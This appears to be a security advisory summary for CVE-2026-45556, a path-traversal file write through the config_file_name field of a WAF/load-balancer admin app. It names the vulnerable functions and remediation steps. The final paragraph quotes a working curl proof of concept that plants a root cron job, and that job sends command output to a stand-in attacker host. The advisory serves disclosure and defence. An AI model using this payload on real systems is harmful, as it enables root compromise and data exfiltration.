CVE-2026-45556

An authenticated attacker with group admin privileges can send a POST request to `/waf/<service>/<server_ip>/rule/<rule_id>/save`. This request includes a `config_file_name` form field containing an encoded path and a `config` field with the payload. The `config_file_name` is decoded and written to the specified path, allowing an attacker to drop arbitrary files on the load balancer. For example, crafting `config_file_name` as `92etc92cron.d92nginx_cfg_evil` allows writing to `/etc/cron.d/nginx_cfg_evil` [ref_id=1].

The vulnerability lies within the `waf_save_config` function in `app/routes/waf/routes.py` and the subsequent processing in `config_mod.master_slave_upload_and_restart` within `app/modules/config/config.py`. Specifically, the `config_file_name` form field is passed directly to `master_slave_upload_and_restart` without sufficient validation, and the `_replace_config_path_to_correct` and `check_is_conf` functions in `app/modules/common/common.py` provide inadequate path sanitization [ref_id=1].

The advisory does not specify any patches. However, it recommends deleting the `_replace_config_path_to_correct` helper function, which performs the dangerous '92' to '/' substitution. It also suggests replacing the substring-based `check_is_conf` validation with real path containment checks and constraining `config_file_name` to a safe, per-service directory with a deterministic naming pattern [ref_id=1].

The advisory provides the following end-to-end HTTP Proof of Concept: ```bash curl -sb cookies.jar -X POST \ 'https://victim.example/waf/haproxy/<lb_ip>/rule/1/save' \ -H 'X-CSRF-TOKEN: <csrf>' \ --data-urlencode 'save=save' \ --data-urlencode 'config_file_name=92etc92cron.d92nginx_cfg_evil' \ --data-urlencode 'config=* * * * * root /bin/bash -c "curl -k https://attacker.example/$(id|base64 -w0)" ' ``` This request, when made to a vulnerable instance, will cause the load balancer to execute the embedded cron job as root in the next minute [ref_id=1].